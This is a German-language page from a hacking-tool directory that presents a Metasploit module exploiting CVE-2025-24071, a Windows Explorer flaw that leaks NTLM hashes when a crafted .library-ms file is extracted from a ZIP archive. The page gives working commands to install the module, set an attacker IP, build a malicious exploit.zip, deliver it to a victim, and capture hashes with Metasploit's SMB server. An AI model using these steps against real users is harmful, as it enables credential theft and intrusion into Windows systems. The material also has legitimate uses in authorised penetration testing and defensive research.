Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24071-msfvenom — Metasploit-Modul für CVE-2025-24071 - Windows-NTLM-Hash-Leak via .library-ms | Kitploit
Tools/GitHubGitHub/folks-iwd/cve-2025-24071-msfvenom
Exploit-FrameworksPasswortangriffePayload-GenerierungSchwachstellenanalyseExploitation
GitHubfolks-iwd/cve-2025-24071-msfvenom

CVE-2025-24071-msfvenom

Metasploit-Modul für CVE-2025-24071 - Windows-NTLM-Hash-Leak via .library-ms

Repository anzeigen
255vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24071: NTLM-Hash-Leak über .library-ms-Datei (Metasploit-Modul)

Dieses Repository enthält ein Metasploit-Modul zur Ausnutzung von CVE-2025-24071, einer Schwachstelle in Windows Explorer, die NTLM-Hashes preisgibt, wenn eine bösartige .library-ms-Datei aus einem ZIP-Archiv extrahiert wird.

Entwickelt von: FOLKS-IWD


Übersicht

Die Schwachstelle tritt auf, wenn ein Benutzer ein ZIP-Archiv extrahiert, das eine speziell präparierte .library-ms-Datei enthält. Windows Explorer initiiert automatisch eine SMB-Authentifizierungsanfrage an einen in der Datei angegebenen Remoteserver, wodurch der NTLM-Hash des Benutzers ohne jegliche Benutzerinteraktion preisgegeben wird.

Dieses Metasploit-Modul:

  1. Erzeugt eine bösartige .library-ms-Datei.
  2. Verpackt sie in ein ZIP-Archiv.
  3. Integriert Metasploits SMB-Capture-Funktionalität, um NTLM-Hashes zu sammeln. image

Installation
  1. Klonen Sie das Repository:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
  2. Kopieren Sie das Modul in Ihr Metasploit-Modulverzeichnis:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    

Verwendung

  1. Laden Sie das Modul:
    root@kitploit:~
    use auxiliary/server/ntlm_hash_leak
    
  2. Legen Sie die erforderlichen Optionen fest:
    root@kitploit:~
    set ATTACKER_IP 192.168.1.162  # Replace with your IP address
    set FILENAME exploit.zip       # Name of the malicious ZIP file
    set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
    set SHARE_NAME shared          # SMB share name
    
  3. Führen Sie das Modul aus:
root@kitploit:~
  run
  1. Das Modul erzeugt eine bösartige ZIP-Datei (exploit.zip). Stellen Sie diese Datei für das Opfer zum Herunterladen und Extrahieren bereit.
  2. Verwenden Sie Metasploits SMB-Capture-Modul, um NTLM-Hashes zu sammeln:
    root@kitploit:~
    use auxiliary/server/capture/smb
    set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
    run
    
Tool herunterladen